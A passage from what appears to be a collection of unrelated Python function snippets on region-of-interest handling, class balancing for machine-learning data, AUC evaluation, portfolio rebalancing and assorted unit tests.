True)\n\n\tX_out = X_out.join(preds)\n\tX_out.to_csv(\"output/\" + dataset + \"2nb_predictions_gnb.csv\", index = False)\n\n\t#preds.to_csv(, index = False)\n\n\tmean_tpr[-1] = 1.0\n\tauc_score = auc(mean_fpr, mean_tpr)\n\tprint(\"AUC: \" + str(auc_score))\n\n\tclassifier = [\"2nb\"]\n\tauc_score = [auc_score]\n\tscores = pd.DataFrame({'classifier': classifier, 'auc': auc_score})\n\tscores.to_csv(\"output/\" + dataset + \"2nb_auc.csv\", index = False)\n\n\treturn(preds['pred'])", "def finalize(self):\n self.total_priors = np.sum(list(self.priors.values()))\n self.total_blocks = np.sum(list(self.nblocks.values()))\n self.total_fitness = np.sum(list(self.fitness.values()))\n self.blocks = BedTool.from_dataframe(self.df)", "def take_attendance():\n\t\tcount = 0\n\t\tfor person in Simulation.community:\n\t\t\tif Simulation.community[person].went_to_bar():\n\t\t\t\tcount += 1\n\t\tprint(count)\n\t\tStrategy.evalScore(count)\n\t\tSimulation.eval_randoms(count)\n\t\tSimulation.add_to_memory(count)", "def getBalances (self):\n\n return [self.nodes[i].getbalance () for i in range (2)]", "def bilateralize(ds):\n ds_ROIs = ds.copy('deep')\n ds_ROIs.sa['bilat_ROIs'] = [label.split(' ')[-1] for label in ds_ROIs.sa.all_ROIs]\n mv.h5save(results_dir + 'ds_ROIs.hdf5', ds_ROIs)\n print('Combined lateralized ROIs for the provided dataset and saved the dataset.')\n return ds_ROIs", "def returnCompleteBalances(self):\n pass", "def balance_training_set(self, train_patient_ids):\n\n print('Balancing training set:')\n train_patient_ids_0 = [id for id in train_patient_ids if self.train_patients[id]['label'] == 0]\n train_patient_ids_1 = [id for id in train_patient_ids if self.train_patients[id]['label'] == 1]\n print('number of train patients with label \\'0\\':', len(train_patient_ids_0))\n print('number of train patients with label \\'1\\':', len(train_patient_ids_1))\n print('generating duplicates...')\n\n size = max(len(train_patient_ids_0), len(train_patient_ids_1))\n\n train_patient_ids_1_dup = []\n for i in range(size):\n idx_orig = i % len(train_patient_ids_1)\n train_patient_ids_1_dup.append(train_patient_ids_1[idx_orig])\n\n print('number of train patients with label \\'1\\' after duplication:', len(train_patient_ids_1_dup))\n\n train_patient_ids = train_patient_ids_0 + train_patient_ids_1_dup\n\n print('number of train patients after duplication:', len(train_patient_ids))\n print()\n\n random.shuffle(train_patient_ids)\n\n return train_patient_ids", "def test_roi_averaging(self):\n filename = get_test_data_path() + 'sgacc_mask.nii.gz'\n regions = self.dataset.masker.mask(filename, in_global_mask=True)\n avg_vox = reduce.average_within_regions(self.dataset, regions)\n n_studies = self.dataset.image_table.data.shape[1]\n self.assertEqual(n_studies, avg_vox.shape[1])\n self.assertGreater(avg_vox.sum(), 0.05)", "def storeROI(self):\n\n if self.ou_iom is None:\n \"Please load a file first please!!!!\"\n return\n\n # get the maximum key\n max_ = 0\n\n for event, rois in self.user_rois.iteritems():\n if int(event) > max_: max_ = event\n print event, max_\n \n max_+=1\n\n for event in xrange(max_):\n\n if not event in self.captured_rse_map.keys():\n continue\n\n if len(self.labeltools.stored_labels)>0:\n label_array = self.ou_iom.get_data(larcv.kProductPixel2D,self.output_prod)\n\n # event == TTree entry in the image file so I place that in the event number here.\n\n # STORE ROIs\n \n # If this event doesn't have an ROI, save a blank and continue\n if event not in self.user_rois.keys():\n if event in self.user_rois_src_rse and self.save_roi_RSE.isChecked():\n rse = self.user_rois_src_rse[event]\n self.ou_iom.set_id( rse[0], rse[1], rse[2] )\n else:\n self.ou_iom.set_id(1,0,event)\n\n elif len(self.user_rois[event]) == 0:\n # User accidentally hit capture ROIs when no ROI drawn, save a blank and continue\n if event in self.user_rois_src_rse and self.save_roi_RSE.isChecked():\n rse = self.user_rois_src_rse[event]\n self.ou_iom.set_id( rse[0], rse[1], rse[2] )\n else:\n self.ou_iom.set_id(1,0,event)\n\n # It's a fine ROI\n # if event has a stored run, subrun, event. put it in here\n elif event in self.user_rois_src_rse and self.save_roi_RSE.isChecked():\n rse = self.user_rois_src_rse[event]\n print \"storing ROIs for \",rse\n self.ou_iom.set_id( rse[0], rse[1], rse[2] )\n # no RSE, put a 1 in the subrun to indicate one exists\n elif event not in self.user_rois_src_rse or not self.save_roi_RSE.isChecked():\n self.ou_iom.set_id(1,1,event)\n\n # There is ROI so lets append the larcv converted ROIs and put them into the ROOT file\n if event in self.user_rois_larcv and len(self.user_rois_larcv[event])>0:\n roiarray = self.ou_iom.get_data(larcv.kProductROI,self.output_prod)\n for larcv_roi in self.user_rois_larcv[event]:\n roiarray.Append(larcv_roi)\n\n # There are vertices, too\n if event in self.user_vertices_larcv and len(self.user_vertices_larcv[event])>0:\n vertex_array = self.ou_iom.get_data(larcv.kProductPixel2D,'vertex_%s' % self.output_prod)\n for larcv_vertex2d in self.user_vertices_larcv[event]:\n if larcv_vertex2d != (None,None,None):\n print \"storing \",larcv_vertex2d\n for p,vert in enumerate( larcv_vertex2d ):\n vertex_array.Append( p, vert )\n\n # Are there labeling images?\n if event in self.labeltools.stored_labels:\n print \"storing labels for event=\",event,\n pixelclusters = self.labelimg2pixelcluster( self.labeltools.stored_labels[event] )\n for p,pixelcluster in enumerate( pixelclusters ):\n print \" plane=\",p,\":\",pixelcluster.size(),\" \",\n label_array.Append( p, pixelcluster )\n elif event not in self.labeltools.stored_labels and len(self.labeltools.stored_labels)>0:\n print \"inserting empty pixelclusters\"\n # make empty pixelclusters\n for p in xrange(0,3):\n pc = larcv.Pixel2DCluster()\n label_array.Append( p, pc )\n \n # Save them to the tree\n out_rse = self.captured_rse_map[event]\n print 'Saving RSE =',out_rse\n self.ou_iom.set_id(out_rse[0],out_rse[1],out_rse[2])\n self.ou_iom.save_entry()\n\n # Put it on the disk\n self.ou_iom.finalize()", "def test_ipam_rirs_delete(self):\n pass", "def test_dbscan_user_dataset(self):\n sp_file = os.path.join(\"tests\", \"data\", \"geolife\", \"geolife_staypoints.csv\")\n sp = ti.read_staypoints_csv(sp_file, tz=\"utc\", index_col=\"id\", crs=\"epsg:4326\")\n # take the first row and duplicate once\n sp = sp.head(1)\n sp = pd.concat([sp, sp], ignore_index=True)\n # assign a different user_id to the second row\n sp.iloc[1, 4] = 1\n\n # duplicate for a certain number\n sp = pd.concat([sp] * 6, ignore_index=True)\n _, locs_ds = sp.as_staypoints.generate_locations(\n method=\"dbscan\", epsilon=10, num_samples=1, distance_metric=\"haversine\", agg_level=\"dataset\"\n )\n _, locs_us = sp.as_staypoints.generate_locations(\n method=\"dbscan\", epsilon=10, num_samples=1, distance_metric=\"haversine\", agg_level=\"user\"\n )\n loc_dataset_num = len(locs_ds.index.unique())\n loc_user_num = len(locs_us.index.unique())\n assert loc_dataset_num == 1\n assert loc_user_num == 2", "def test_pandas_occupancy_compare(self):\n data = load_occupancy(return_dataset=True)\n X, y = data.to_pandas()\n\n _, _, y_train, y_test = tts(X, y, test_size=0.4, random_state=2242)\n\n # Create and fit the visualizer\n oz = ClassBalance()\n assert oz.fit(y_train, y_test) is oz\n\n # oz.finalize()\n self.assert_images_similar(oz, tol=0.5) # w/o tol fails with RMS 0.433", "def get_image_balance(self, image_array, respawn_filter):\n balance_array = []\n apply_respawn_filter = hasattr(self, 'respawnFilter') and respawn_filter\n\n for row_number, each_row in enumerate(image_array):\n for pixel_number, each_pixel in enumerate(each_row):\n if apply_respawn_filter:\n if self.respawnFilter[\"respawn-filter\"][row_number][pixel_number] == 0:\n continue\n avg_num = reduce(lambda x, y: int(x) + int(y), each_pixel[:3]) / 3\n balance_array.append(avg_num)\n\n balance = reduce(lambda x, y: x + y, balance_array) / len(balance_array)\n return balance", "def test_CreateROI1(self):\r\n\r\n self.delayDisplay(\"Starting the test\")\r\n #\r\n # first, get some data\r\n #\r\n import urllib\r\n downloads = (\r\n ('http://slicer.kitware.com/midas3/download?items=5767', 'FA.nrrd', slicer.util.loadVolume),\r\n )\r\n\r\n for url,name,loader in downloads:\r\n filePath = slicer.app.temporaryPath + '/' + name\r\n if not os.path.exists(filePath) or os.stat(filePath).st_size == 0:\r\n logging.info('Requesting download %s from %s...\\n' % (name, url))\r\n urllib.urlretrieve(url, filePath)\r\n if loader:\r\n logging.info('Loading %s...' % (name,))\r\n loader(filePath)\r\n self.delayDisplay('Finished with download and loading')\r\n\r\n volumeNode = slicer.util.getNode(pattern=\"FA\")\r\n logic = CreateROILogic()\r\n self.assertIsNotNone( logic.hasImageData(volumeNode) )\r\n self.delayDisplay('Test passed!')", "def cluster_bal_iter(self):\n # moving\n for j,cluster in enumerate(self.clusters):\n cluster.move()\n self.clusters_allocate_cells()\n for j,cluster in enumerate(self.clusters):\n cluster.calc()\n #print j, '\\t', cluster.center, '\\t', cluster.np, '\\t', cluster.size\n \n # resizing\n for j,cluster in enumerate(self.clusters):\n cluster.resize()\n self.clusters_allocate_cells()\n for j,cluster in enumerate(self.clusters):\n cluster.calc()\n #print j, '\\t', cluster.center, '\\t', cluster.np, '\\t', cluster.size\n \n self.calc()", "def main(dataset_name, disease_label):\n # ----------------------------------------------------------------------------\n n_bootstrap = 1000\n\n model_name = 'supervised_aae'\n\n participants_path = PROJECT_ROOT / 'data' / dataset_name / 'participants.tsv'\n freesurfer_path = PROJECT_ROOT / 'data' / dataset_name / 'freesurferData.csv'\n\n hc_label = 1\n\n # ----------------------------------------------------------------------------\n bootstrap_dir = PROJECT_ROOT / 'outputs' / 'bootstrap_analysis'\n model_dir = bootstrap_dir / model_name\n ids_path = PROJECT_ROOT / 'outputs' / (dataset_name + '_homogeneous_ids.csv')\n\n # ----------------------------------------------------------------------------\n clinical_df = load_dataset(participants_path, ids_path, freesurfer_path)\n clinical_df = clinical_df.set_index('participant_id')\n\n tpr_list = []\n auc_roc_list = []\n effect_size_list = []\n\n for i_bootstrap in tqdm(range(n_bootstrap)):\n bootstrap_model_dir = model_dir / '{:03d}'.format(i_bootstrap)\n\n output_dataset_dir = bootstrap_model_dir / dataset_name\n output_dataset_dir.mkdir(exist_ok=True)\n\n analysis_dir = output_dataset_dir / '{:02d}_vs_{:02d}'.format(hc_label, disease_label)\n analysis_dir.mkdir(exist_ok=True)\n\n # ----------------------------------------------------------------------------\n normalized_df = pd.read_csv(output_dataset_dir / 'normalized.csv', index_col='participant_id')\n reconstruction_df = pd.read_csv(output_dataset_dir / 'reconstruction.csv', index_col='participant_id')\n reconstruction_error_df = pd.read_csv(output_dataset_dir / 'reconstruction_error.csv',\n index_col='participant_id')\n\n # ----------------------------------------------------------------------------\n # Compute effect size of the brain regions for the bootstrap iteration\n diff_df = np.abs(normalized_df - reconstruction_df)\n region_df = compute_brain_regions_deviations(diff_df, clinical_df, disease_label)\n effect_size_list.append(region_df['effect_size'].values)\n region_df.to_csv(analysis_dir / 'regions_analysis.csv', index=False)\n\n # ----------------------------------------------------------------------------\n # Compute AUC-ROC for the bootstrap iteration\n roc_auc, tpr = compute_classification_performance(reconstruction_error_df, clinical_df, disease_label)\n auc_roc_list.append(roc_auc)\n tpr_list.append(tpr)\n\n (bootstrap_dir / dataset_name).mkdir(exist_ok=True)\n comparison_dir = bootstrap_dir / dataset_name / ('{:02d}_vs_{:02d}'.format(hc_label, disease_label))\n comparison_dir.mkdir(exist_ok=True)\n\n # ----------------------------------------------------------------------------\n # Save regions effect sizes\n effect_size_df = pd.DataFrame(columns=COLUMNS_NAME, data=np.array(effect_size_list))\n effect_size_df.to_csv(comparison_dir / 'effect_size.csv')\n\n # Save AUC bootstrap values\n auc_roc_list = np.array(auc_roc_list)\n auc_roc_df = pd.DataFrame(columns=['AUC-ROC'], data=auc_roc_list)\n auc_roc_df.to_csv(comparison_dir / 'auc_rocs.csv', index=False)\n\n # ----------------------------------------------------------------------------\n # Create Figure 3 of the paper\n tpr_list = np.array(tpr_list)\n mean_tprs = tpr_list.mean(axis=0)\n tprs_upper = np.percentile(tpr_list, 97.5, axis=0)\n tprs_lower = np.percentile(tpr_list, 2.5, axis=0)\n\n plt.plot(np.linspace(0, 1, 101),\n mean_tprs,\n 'b', lw=2,\n label='ROC curve (AUC = {:0.3f} ; 95% CI [{:0.3f}, {:0.3f}])'.format(np.mean(auc_roc_list),\n np.percentile(auc_roc_list, 2.5),\n np.percentile(auc_roc_list, 97.5)))\n\n plt.fill_between(np.linspace(0, 1, 101),\n tprs_lower, tprs_upper,\n color='grey', alpha=0.2)\n\n plt.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1.05])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.legend(loc='lower right')\n plt.savefig(comparison_dir / 'AUC-ROC.eps', format='eps')\n plt.close()\n plt.clf()\n\n # --------------------------------------------------------------------------------------------\n # Create figure for supplementary materials\n effect_size_df = effect_size_df.reindex(effect_size_df.mean().sort_values().index, axis=1)\n\n plt.figure(figsize=(16, 20))\n plt.hlines(range(101),\n np.percentile(effect_size_df, 2.5, axis=0),\n np.percentile(effect_size_df, 97.5, axis=0))\n\n plt.plot(effect_size_df.mean().values, range(101), 's', color='k')\n plt.axvline(0, ls='--')\n plt.yticks(np.arange(101), effect_size_df.columns)\n plt.xlabel('Effect size')\n plt.ylabel('Brain regions')\n plt.tight_layout()\n plt.savefig(comparison_dir / 'Regions.eps', format='eps')\n plt.close()\n plt.clf()\n\n # --------------------------------------------------------------------------------------------\n # Create Figure 4 of the paper\n effect_size_sig_df = effect_size_df.reindex(effect_size_df.mean().sort_values().index, axis=1)\n lower_bound = np.percentile(effect_size_sig_df, 2.5, axis=0)\n higher_bound = np.percentile(effect_size_sig_df, 97.5, axis=0)\n\n for i, column in enumerate(effect_size_sig_df.columns):\n if (lower_bound[i] < 0) & (higher_bound[i] > 0):\n effect_size_sig_df = effect_size_sig_df.drop(columns=column)\n\n n_regions = len(effect_size_sig_df.columns)\n\n plt.figure()\n plt.hlines(range(n_regions),\n np.percentile(effect_size_sig_df, 2.5, axis=0),\n np.percentile(effect_size_sig_df, 97.5, axis=0))\n\n plt.plot(effect_size_sig_df.mean().values, range(n_regions), 's', color='k')\n plt.axvline(0, ls='--')\n plt.yticks(np.arange(n_regions), effect_size_sig_df.columns)\n plt.xlabel('Effect size')\n plt.ylabel('Brain regions')\n plt.tight_layout()\n plt.savefig(comparison_dir / 'Significant_regions.eps', format='eps')\n plt.close()\n plt.clf()", "def set_num_rois(self,num_rois):\n for _ in range(num_rois,len(self.rois)): # delete unneeded ROIs\n self.rois.pop()\n for _ in range(len(self.rois), num_rois): # make new ROIs\n self.rois.append(ROI(1,1,4,4,num_images=self.num_images))", "def finetune_n_estimators_createData():\n acc, auc = [], []\n for i in tqdm([j*10 for j in range(1,31)],desc='Progress(n_estimators)',ncols=70,smoothing=0.5):\n X_train, X_test, y_train, y_test, X, y_binary = initializing()\n XGBCla = get_XGBmodel(n_est=i)\n XGBCla = XGBCla.fit(X_train, y_train)\n acc.append(accuracy_score(XGBCla.predict(X_test),y_test))\n auc.append(roc_auc_score(XGBCla.predict(X_test),y_test))\n np.save(\"npy-data/result_n_estimators_tuning_acc_auc_crossval_train\",acc+auc)", "def balance(self):\n return sum(self.operations.select())\n 11", "def main(self, img, roi):\n\n self.img = img\n self.roi = roi\n transimg1, odimg1 = imageprocess.calc_absimage(np.dstack([img[:, :, 1],\n img[:, :, 5],\n img[:, :, 3]]),\n norm_edge=True)\n transimg2, odimg2 = imageprocess.calc_absimage(np.dstack([img[:, :, 2],\n img[:, :, 6],\n img[:, :, 4]]),\n norm_edge=True)\n odimg1 = imageprocess.normalize_edgestrip(odimg1)\n odimg2 = imageprocess.normalize_edgestrip(odimg2)\n balance = odimg1[roi].mean() / odimg2[roi].mean()\n\n self.ax1.imshow(transimg1, vmin=0, vmax=1.35, cmap=mpl.cm.gray)\n self.ax2.imshow(transimg2, vmin=0, vmax=1.35, cmap=mpl.cm.gray)\n self.balance_label.setText('The balance is %s'%balance)", "def roi(self):\n return super().get_queryset().exclude(\n outcome__isnull=True\n ).all().aggregate(\n roi=Sum('profit') / Sum('size_matched')\n )['roi']", "def prepare_roidb(self):\n # for pascal_voc dataset\n roidb = self.gt_roidb()\n # data argument\n if self.cfg.if_flipped is True:\n print('append flipped images to training')\n roidb = self.append_flipped_images(roidb)\n\n sizes = [PIL.Image.open(self.image_path_at(i)).size\n for i in range(self.num_images)]\n\n for i in range(len(self.image_index)):\n roidb[i]['image'] = self.image_path_at(i)\n roidb[i]['width'] = sizes[i][0]\n roidb[i]['height'] = sizes[i][1]\n # need gt_overlaps as a dense array for argmax\n gt_overlaps = roidb[i]['gt_overlaps'].toarray()\n # max overlap with gt over classes (columns)\n max_overlaps = gt_overlaps.max(axis=1)\n # gt class that had the max overlap\n max_classes = gt_overlaps.argmax(axis=1)\n roidb[i]['max_classes'] = max_classes\n roidb[i]['max_overlaps'] = max_overlaps\n # sanity checks\n # max overlap of 0 => class should be zero (background)\n zero_inds = np.where(max_overlaps == 0)[0]\n assert all(max_classes[zero_inds] == 0)\n # max overlap > 0 => class should not be zero (must be a fg class)\n nonzero_inds = np.where(max_overlaps > 0)[0]\n assert all(max_classes[nonzero_inds] != 0)\n\n self.roi_data = ROIGenerator(roidb, self.num_classes, self.cfg)\n return self.roi_data", "def add_roi_to_dataset(dataset):\n return [(data[0], data[1], data[2], (data[1] * data[2]) / 100) for data in dataset]", "def _sample_rois(all_rois, all_scores, gt_boxes, fg_rois_per_image, rois_per_image, num_classes):\n\n # print(gt_boxes)\n # fang[-1] ok\n\n # overlaps: (rois x gt_boxes)\n overlaps = bbox_overlaps(\n all_rois[:, 1:5].data,\n gt_boxes[:, :4].data)\n max_overlaps, gt_assignment = overlaps.max(1)\n labels = gt_boxes[gt_assignment, [4]]\n\n # Select foreground RoIs as those with >= FG_THRESH overlap\n fg_inds = (max_overlaps >= cfg.TRAIN.FG_THRESH).nonzero().view(-1)\n # Guard against the case when an image has fewer than fg_rois_per_image\n # Select background RoIs as those within [BG_THRESH_LO, BG_THRESH_HI)\n bg_inds = ((max_overlaps < cfg.TRAIN.BG_THRESH_HI) + (max_overlaps >= cfg.TRAIN.BG_THRESH_LO) == 2).nonzero().view(-1)\n\n # Small modification to the original version where we ensure a fixed number of regions are sampled\n if fg_inds.numel() > 0 and bg_inds.numel() > 0:\n fg_rois_per_image = min(fg_rois_per_image, fg_inds.numel())\n fg_inds = fg_inds[torch.from_numpy(npr.choice(np.arange(0, fg_inds.numel()), size=int(fg_rois_per_image), replace=False)).long().cuda()]\n bg_rois_per_image = rois_per_image - fg_rois_per_image\n to_replace = bg_inds.numel() < bg_rois_per_image\n bg_inds = bg_inds[torch.from_numpy(npr.choice(np.arange(0, bg_inds.numel()), size=int(bg_rois_per_image), replace=to_replace)).long().cuda()]\n elif fg_inds.numel() > 0:\n to_replace = fg_inds.numel() < rois_per_image\n fg_inds = fg_inds[torch.from_numpy(npr.choice(np.arange(0, fg_inds.numel()), size=int(rois_per_image), replace=to_replace)).long().cuda()]\n fg_rois_per_image = rois_per_image\n elif bg_inds.numel() > 0:\n to_replace = bg_inds.numel() < rois_per_image\n bg_inds = bg_inds[torch.from_numpy(npr.choice(np.arange(0, bg_inds.numel()), size=int(rois_per_image), replace=to_replace)).long().cuda()]\n fg_rois_per_image = 0\n else:\n import pdb\n pdb.set_trace()\n\n\n # The indices that we're selecting (both fg and bg)\n keep_inds = torch.cat([fg_inds, bg_inds], 0)\n \n # Select sampled values from various arrays:\n labels = labels[keep_inds].contiguous()\n # Clamp labels for the background RoIs to 0\n labels[int(fg_rois_per_image):] = 0\n # print(int(fg_rois_per_image)) -> 16\n\n rois = all_rois[keep_inds].contiguous()\n roi_scores = all_scores[keep_inds].contiguous()\n\n\n\n bbox_target_data, front_2_1_points_targets_data, front_2_2_points_targets_data, front_center_targets_data, \\\n back_2_1_points_targets_data, back_2_2_points_targets_data, back_center_targets_data, center_targets_data\\\n = _compute_targets(rois[:, 1:5].data, gt_boxes[gt_assignment[keep_inds]][:, :4].data, labels.data,\\\n gt_boxes[gt_assignment[keep_inds]][:, 5:9].data, gt_boxes[gt_assignment[keep_inds]][:, 9:13].data, \\\n gt_boxes[gt_assignment[keep_inds]][:, 13:15].data, gt_boxes[gt_assignment[keep_inds]][:, 15:19].data, \\\n gt_boxes[gt_assignment[keep_inds]][:, 19:23].data, gt_boxes[gt_assignment[keep_inds]][:, 23:25].data, \\\n gt_boxes[gt_assignment[keep_inds]][:, 25:27].data)\n\n bbox_targets, bbox_inside_weights, front_2_1_points_targets, front_2_2_points_targets, front_center_targets, \\\n back_2_1_points_targets, back_2_2_points_targets, back_center_targets, center_targets, front_center_inside_weights \\\n = _get_bbox_regression_labels(bbox_target_data, num_classes, front_2_1_points_targets_data, front_2_2_points_targets_data, \\\n front_center_targets_data, back_2_1_points_targets_data, back_2_2_points_targets_data, back_center_targets_data, center_targets_data)\n \n \n\n return labels, rois, roi_scores, bbox_targets, bbox_inside_weights, front_2_1_points_targets, front_2_2_points_targets, front_center_targets, \\\n back_2_1_points_targets, back_2_2_points_targets, back_center_targets, center_targets, front_center_inside_weights", "def Balance_Data(data, dependent):\n\t#print \"Balancing data...\"\n\tpositives = data[(data[dependent]==1)]\n\tnegatives = data.drop(positives.index).sample(n=len(positives))\n\tbalanced_data = pd.concat([positives,negatives])\n\treturn balanced_data", "def process_risk_of_biases(conn, extractors, review, trial_id):\n\n # Extract and write source\n source = extractors['extract_source'](None)\n source_id = writers.write_source(conn, source)\n\n success = 0\n keyword_filters = ['published', 'for publication']\n\n conn['database'].begin()\n\n try:\n rob = extractors['extract_rob'](review, trial_id, source_id)\n\n # Write risk_of_bias, risk_of_bias_criteria and\n # risk_of_bias-risk_of_bias_criteria if review is for publication\n if any(keyword in review['file_name'].lower() for keyword in keyword_filters):\n rob_id = writers.write_rob(conn, rob)\n review_results = extractors['extract_review_results'](review['robs'])\n for result in review_results:\n rob_crt = extractors['extract_rob_criteria'](result)\n rob_crt_id = writers.write_rob_criteria(conn, rob_crt)\n\n rob_rob_crt = extractors['extract_rob_rob_criteria'](result, rob_id,\n rob_crt_id)\n writers.write_rob_rob_criteria(conn, rob_rob_crt)\n\n # Delete risk_of_bias and risk_of_bias-risk_of_bias_criteria if\n # the review is not for publication\n else:\n writers.delete_rob(conn, rob)\n except Exception:\n config.SENTRY.captureException()\n conn['database'].rollback()\n else:\n success += 1\n conn['database'].commit()\n if not success % 100:\n logger.info('Processed %s cohrane reviews from %s', success)", "def rebalance(context, data):\n logger.debug('rebalancing on: %s', algo.get_datetime())\n\n context.trend_filter = False\n\n # new_portfolio = algo.pipeline_output('pipeline').dropna(subset=['overall_rank']).sort_values('momentum', ascending=False)\n\n new_portfolio = algo.pipeline_output('pipeline').dropna(subset=['overall_rank']).sort_values('momentum', ascending=False)\n\n for equity, row in new_portfolio.iterrows():\n logger.debug('new portfolio (before filtering) - equity: %s', equity)\n\n # print(new_portfolio)\n\n # new_portfolio = new_portfolio[new_portfolio['overall_rank'].notna() & new_portfolio['momentum'] > 40][:20]\n \n # new_portfolio = new_portfolio[(new_portfolio['momentum_decile'] > 8)][:20]\n\n new_portfolio = new_portfolio.nlargest(20, ['overall_rank', 'momentum']) #<- $600K PL in 10 years\n\n # new_portfolio = new_portfolio.nlargest(20, ['momentum', 'overall_rank']) #<- 1M PL in 10 years\n\n if logger.level is logging.DEBUG:\n for equity, row in new_portfolio.iterrows():\n logger.debug('new portfolio - (after filtering) equity: %s', equity)\n \n\n # print(len(new_portfolio.index))\n\n # volatility driven weights\n # new_portfolio['inverse_volatility'] = new_portfolio['volatility'].apply(lambda x: 1 / x)\n # inv_vola_sum = new_portfolio['inverse_volatility'].sum()\n # new_portfolio['target_weight'] = new_portfolio['inverse_volatility'].apply(lambda x: x / inv_vola_sum)\n\n # portfolio size driven weights\n # num_equities = len(new_portfolio.index)\n # new_portfolio['target_weight'] = 1 / num_equities\\\n\n # logger.info('len existing portfolio: %s', len(context.portfolio.positions))\n\n if logger.level is logging.DEBUG:\n for equity, values in context.portfolio.positions.items():\n logger.debug('context.portfolio.positions - equity: %s, amount: %s, cost_basis: %s, sold_on: %s, sold_at_price: %s', equity, values.amount, values.cost_basis, values.last_sale_date, values.last_sale_price)\n\n \n order_target(algo.sid('FIBBG000NTFYM5'), 0)\n logger.debug('selling all bonds')\n\n for equity in context.portfolio.positions:\n if equity is algo.sid('FIBBG000NTFYM5'): \n continue\n if equity not in set(new_portfolio.index.tolist()):\n # logger.info('selling %s', equity)\n order_target_percent(equity, 0)\n\n stock_weights = 1.0 / max(len(context.portfolio.positions), len(new_portfolio.index))\n\n logger.debug('len existing portfolio (afer ejection): %s', len(context.portfolio.positions))\n logger.debug('len new portfolio: %s', len(new_portfolio.index))\n logger.debug('stock_weights: %s', stock_weights)\n\n # print(context.portfolio.positions.get(algo.sid('FIBBG000NTFYM5')))\n\n # spy = context.portfolio.positions.get(algo.sid('FIBBG000NTFYM5'))\n\n # if (spy is not None) and (spy.amount > 0):\n # order_target_percent(algo.sid('FIBBG000NTFYM5'), 0)\n\n for equity, row in new_portfolio.iterrows():\n if row.trend_filter is True:\n # logger.info('buying %s', equity)\n context.trend_filter = True\n order_target_percent(equity, stock_weights)\n else:\n context.trend_filter = False\n \n logger.debug('cash: %s', context.portfolio.cash)\n logger.debug('portfolio_value: %s', context.portfolio.portfolio_value)\n logger.debug('num_positions: %s', len(context.portfolio.positions))\n logger.debug('positions: %s', context.portfolio.positions)", "def balance_classes(data, labels):\n\n index_dict = {}\n\n for idx, label in enumerate(labels):\n if label not in index_dict:\n index_dict[label] = [idx]\n else:\n index_dict[label] += [idx]\n\n index_list = list(index_dict.values())\n\n min_balanced_number = min([len(l) for l in index_list])\n\n index_to_take_list = np.concatenate([\n np.random.choice(l, min_balanced_number, replace=False)\n for l in index_list\n ])\n\n np.random.shuffle(index_to_take_list)\n\n return data[index_to_take_list], labels[index_to_take_list]", "def data_balancing(path):\r\n \r\n distribution_list = data_distribution(path)\r\n \r\n balancing_factor = []\r\n for i in range(len(distribution_list)):\r\n #print(i,distribution_list[i])\r\n #multiplier = max(distribution_list) / distribution_list[i] - 1\r\n multiplier = (np.round(5000 / distribution_list[i],0))\r\n multiplier = int(np.round(multiplier/4,0))\r\n balancing_factor.append(multiplier)\r\n #print(\"sddada\",max(distribution_list) / distribution_list[i])\r\n return balancing_factor", "def load_binary_imbalanced(classes=(1,7), ratio=0.1):\r\n train_set, train_set_target = load_data()\r\n \r\n # binarize\r\n mask_train_set_imb = np.logical_or(train_set_target == classes[0],train_set_target == classes[1])\r\n (data_set_imb,data_set_imb_target)= (train_set[mask_train_set_imb], train_set_target[mask_train_set_imb])\r\n\r\n # imbalance\r\n data_minority = data_set_imb[data_set_imb_target == classes[1]]\r\n data_minority_target = data_set_imb_target[data_set_imb_target == classes[1]]\r\n data_majority = data_set_imb[data_set_imb_target == classes[0]]\r\n data_majority_target = data_set_imb_target[data_set_imb_target == classes[0]]\r\n original_size = data_minority_target.shape[0]\r\n majority_size = data_majority_target.shape[0]\r\n target_size = int(np.floor(majority_size * ratio))\r\n indices = np.random.choice(original_size, size=target_size)\r\n data_minority = data_minority[indices]\r\n data_minority_target = data_minority_target[indices]\r\n\r\n # merge\r\n train_set = np.concatenate([data_minority, data_majority])\r\n train_set_target = np.concatenate([data_minority_target, data_majority_target])\r\n\r\n #shuffle\r\n train_set, train_set_target = np.hsplit(\r\n np.random.permutation(\r\n np.hstack((train_set, train_set_target.reshape((train_set_target.shape[0], 1))))\r\n ), [-1]\r\n )\r\n train_set_target = np.asarray(train_set_target, dtype='int').reshape((train_set_target.shape[0],))\r\n return (train_set[:],train_set_target[:])", "def split_train_test_classifier(self, split_method, method):\n \n # split data balance based on user and act (if provided)\n if method == 'window_based':\n data_train, data_val, label_user_train, label_user_val, id_window_train, id_window_val = self.split_train_val_classifier(\n self.classifier['data'], self.classifier['user_label'], self.classifier['act_label'], self.classifier['id'], 'standard', train_size=0.9) \n\n print(f'Train window before delete overlap sequence: {data_train.shape[0]}')\n\n # delete overlap sequence\n if self.overlap != 0:\n if self.overlap == 0.5:\n distance_to_delete = [1]\n elif self.overlap == 0.75:\n distance_to_delete = [1,2,3]\n invalid_idx = delete_overlap(id_window_train, id_window_val, distance_to_delete)\n data_train = np.delete(data_train, invalid_idx, axis=0)\n label_user_train = np.delete(label_user_train, invalid_idx, axis=0)\n\n print(f'Train window after delete overlap sequence: {data_train.shape[0]}')\n print(f'Validation set: {data_val.shape[0]}')\n \n elif method == 'cycle_based':\n data_train, data_val, label_user_train, label_user_val = self.split_train_val_classifier(\n self.classifier['data'], self.classifier['user_label'], self.classifier['act_label'], None, split_method, train_size=0.9) \n\n self.train = data_train\n self.train_user = label_user_train\n self.val = data_val\n self.val_user = label_user_val", "def ior_write_dataset(self):\n for oclass in self.obj_class:\n for sizes in self.ior_chu_trs_blk_size:\n # Skip the object type if server count does not meet the minimum\n # EC object server count\n if oclass[1] > self.server_count:\n continue\n self.ior_param_update(oclass, sizes)\n\n # Create the new container with correct redundancy factor\n # for EC object type\n self.ec_contaier_create(oclass[0])\n self.update_ior_cmd_with_pool(oclass=oclass[0],\n create_cont=False)\n # Start IOR Write\n self.container.uuid = self.ec_container.uuid\n self.start_ior_load(operation=\"WriteRead\", percent=1,\n create_cont=False)\n self.cont_uuid.append(self.ior_cmd.dfs_cont.value)", "def balance(labels):\n # subsample positive labels if we have too many\n labels = subsample_positive_labels(labels)\n\n # subsample negative labels if we have too many\n labels = subsample_negative_labels(labels)\n\n return labels", "def test_re_balance(self):\n shards = []\n control_table_item_list = []\n kinesis_ramp1 = self.get_kinesis_ramp()\n kinesis_ramp2 = self.get_kinesis_ramp()\n kinesis_ramp3 = self.get_kinesis_ramp()\n worker_id = 